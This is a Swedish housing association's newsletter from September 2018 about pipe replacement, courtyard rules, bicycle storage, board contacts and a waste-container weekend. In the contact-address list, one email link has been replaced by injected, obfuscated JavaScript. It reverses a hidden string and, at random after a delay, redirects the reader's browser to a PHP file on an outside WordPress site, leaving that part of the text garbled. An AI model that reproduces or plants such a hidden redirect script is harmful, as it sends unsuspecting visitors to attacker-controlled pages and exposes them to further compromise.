Föreningsmeddelande September 2018

Idag har vi delat ut det senaste föreningsmeddelandet i allas brevlådor. Nedan kan ni läsa det digitalt. Ni kan även ladda ner det som PDF här.

Stambyte

Stambytet har dragit igång igen efter semestrarna och tidplanen följs för arbetet i lägenheterna. Notera att angivna tider för respektive lägenhet gäller standardrenovering. Väljer man t ex Stockholmsdusch som tillägg tar det en vecka extra. När lägenheten är klar ska den besiktigas. Det görs av flera lägenheter samtidigt och av flera olika besiktningsmän varför det kan ta några dagar extra innan den sammanställda rapporten om eventuella anmärkningar når byggarna för åtgärd. Dessa utförs sedan normalt inom ett par veckor. Efter avslutade åtgärder byts låsen ut mot boendes egna igen. Tiden från färdigställande till åtgärdade anmärkningar ingår inte i den ursprungliga tidplanen, den gäller det stora arbetet i lägenheten under själva stambytet. I tillägg till stambytet har vi lagt till några extra åtgärder främst i källarna:
  • Det visade sig att våra kallvattenstammar, som hänger i källartaken, var av stålrör och hade nått sin tekniska livslängd. Som ett tilläggsarbete byts dessa ut mot nya stammar av koppar. Lyckligtvis var motsvarande stammar i kulvertarna mellan husen av koppar, och behöver inte bytas.
  • Vidare har vi rensat och filmat avloppen i källargolven. Vi har nu beslutat att rören i alla husen ska relinas, en lämplig åtgärd för gjutjärnsrör som nått slutet för sin slutlängd. I samband med detta byts också de slitna brunnarna ut i tvättstugorna.
Dessa arbeten innebär naturligtvis att verksamhet kommer att pågå ytterligare en tid i källarna innan dessa kan slutstädas och skadade ytor återställas. Vatten och avlopp kommer att fungera som vanligt under tiden, med endast korta avbrott för in- och urkoppling av provisoriska ledningar, liksom med avbrott i tvättstugorna medan brunnsbyte görs. Tvättid kan då bokas i de andra husen. Information om avbrott lämnas i förväg. Bastun och föreningslokalen berörs i liten utsträckning, meddelande kommer att gå ut när de är avstängda för arbeten. För föreningslokalen gäller som i våras att den är öppen för alla dagtid vardagar, och således bara kan bokas kvällar och helger. Detta för att ha en tillflyktsplats när störningarna i lägenheten är störst. Frågor gällande stambytet skickas till vår representant Stefan Simic hos HSB konsult som för vår talan mot byggmästargruppen: Svart katt & anonyma lappar till styrelsen

Styrelsen har fått anonyma lappar i sin brevlåda angående en svart katt som upplevs besvärande och rör sig på andra medlemmars balkonger. Vi vill påpeka att vi i fortsättningen inte önskar några anonyma lappar utan att ni märker dem med namn och kontaktuppgifter för att vi ska kunna hantera ärendet. Generellt uppmanar vi er alla att prata med era grannar och lösa vardagens små bekymmer genom samtal med varandra.

Dags att ta in grillarna

Nu går vi mot höst och vinter och vill påminna att det är dags att ta in alla grillar från våra gårdar och förvara i eget förråd. Grillar som inte tagits bort senast den 7:e oktober kommer att tas om hand av styrelsen för att sedan forslas bort.

Gårdarna

Den observante har upptäckt att nygamla stenläggningar (gångar och dräneringskanaler) har dykt upp på våra gårdar. Arbetet har utförts av vår trädgårdsfirma och arbetet utfördes under sommaren.

Cykelförvaring

Vi vill återigen påminna om att det inte är tillåtet att förvara cyklar under källartrapporna eller fastlåsta i trappräcken och lyktstolpar. Vi uppmanar er också att ställa in de cyklar som ni inte använder under vinterhalvåret för att underlätta snöröjning.

Kontakt med styrelsen

Önskar ni komma i kontakt med styrelsen ber vi er använda någon av föreningens e-postadresser med hänsyn till ert ärende. Då når ni direkt den eller de personer som hanterar er fråga och styrelsen får en enklare administration med färre mejl.
För närvarande har vi följande adresser:
Frågor om matavfall: $mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(“”).reverse().join(“”);return $mWn.list[n];};$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:bastu@brfraven.se” target=”_blank” rel=”noopener”>bastu@brfraven.se

Ny hemsida & Felanmälan

Vår nya hemsida smyglanserades under sommaren och finns nu på www.brfraven.se. Där finns även anmälan för att få registrera sig för vårt nyhetsbrev och länk till felanmälan. Hör av dig om du saknar något eller hittar något fel. Vid felanmälan börjar du skriva in namnet på vår föreningen (att skriva räven fungerar bra) och man väljer sedan HSB:s Räven i Solna i den lista som presenteras.

Containerhelg

Helgen den 6-7 oktober kommer en container att finnas tillgänglig för inlämning av brännbart material och metallskrot. Containern kommer att placeras på gården framför entré portarna till Hjortstigen 2 A-C. Som vanligt gäller att målarfärg, däck och kemikalier inte får lämnas i containern.
  • El-avfall såsom datorer, TV-apparater, brödrostar, strykjärn etc. ska lämnas i el- soprummet i källarplanet på Illerstigen 8, inte i containern. Access till el-soprummet finns på den vanliga ”nyckelbrickan”.
  • Wellpapp lämnas vid sopstationen på Björnstigen.
  • Miljöfarligt avfall (målarfärg, lösningsmedel, lampor, mm.) lämnas i miljöstationen vid OKQ8.
Container är även planerad till den 19-20 januari 2019 och 13-14 april 2019.
Med vänliga hälsningar
Styrelsen